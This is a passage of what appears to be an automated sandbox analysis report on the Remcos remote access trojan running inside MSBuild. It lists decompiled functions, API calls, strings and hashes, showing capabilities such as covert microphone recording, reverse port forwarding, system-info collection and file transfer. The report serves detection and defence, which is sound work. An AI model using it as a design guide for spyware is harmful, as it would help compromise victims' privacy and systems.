                                                                                                                                            • _free.LIBCMT ref: 00444774
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                            • String ID: C$u;~/
                                                                                                                                            • API String ID: 1679612858-2495169922
                                                                                                                                            • Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                                                            • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                            • Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                                                            • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                            Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Eventinet_ntoa
                                                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                                                            • Opcode ID: 740712f57a3ea757aab75bfadb8a429b272863560802bd983bc756549475bb36
                                                                                                                                            • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                                            • Opcode Fuzzy Hash: 740712f57a3ea757aab75bfadb8a429b272863560802bd983bc756549475bb36
                                                                                                                                            • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                                            Function 0044A0C3 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1324828854-1979702588
                                                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                                            Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                                                            • Opcode ID: cbb48963e8b1355fd2af9712d613811fc1a0336ec70d383140689dfc29f025ae
                                                                                                                                            • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                                            • Opcode Fuzzy Hash: cbb48963e8b1355fd2af9712d613811fc1a0336ec70d383140689dfc29f025ae
                                                                                                                                            • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                            Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                                                            • Opcode ID: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                                                                            • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                                            • Opcode Fuzzy Hash: a486acdecd70e56ae6275222454893cf0b15f71a35234b0713371b2576243bbe
                                                                                                                                            • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                                            Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                                                            • API String ID: 1356121797-903574159
                                                                                                                                            • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                                            • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                                            • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                                            • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                            Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                                              • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                              • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                              • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                                            • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                            • String ID: Remcos
                                                                                                                                            • API String ID: 1970332568-165870891
                                                                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                            • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                            • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                            Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
                                                                                                                                            • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                                            • Opcode Fuzzy Hash: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
                                                                                                                                            • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                                            Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1454806937-0
                                                                                                                                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                            Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: tcp$udp
                                                                                                                                            • API String ID: 0-3725065008
                                                                                                                                            • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                            • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                            • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                            • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                            Function 00443F7B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            • _free.LIBCMT ref: 00444086
                                                                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$AllocateHeap
                                                                                                                                            • String ID: J7D$u;~/
                                                                                                                                            • API String ID: 3033488037-3281933603
                                                                                                                                            • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                            • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                            Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                            • String ID: T=G$p[G$>G$>G
                                                                                                                                            • API String ID: 1596592924-2461731529
                                                                                                                                            • Opcode ID: 03a186512c6701b29411dcb5ad7ed2e07cbc7342fcb7f914bbe2927d5dc56238
                                                                                                                                            • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                            • Opcode Fuzzy Hash: 03a186512c6701b29411dcb5ad7ed2e07cbc7342fcb7f914bbe2927d5dc56238
                                                                                                                                            • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                            Function 00437A80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$u;~/
                                                                                                                                            • API String ID: 1170836740-2003853416
                                                                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                            Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                            • String ID: .part
                                                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                                                            • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                            • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                            • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                            • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                            Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                            • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                            • API String ID: 3286818993-703403762
                                                                                                                                            • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                                            • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
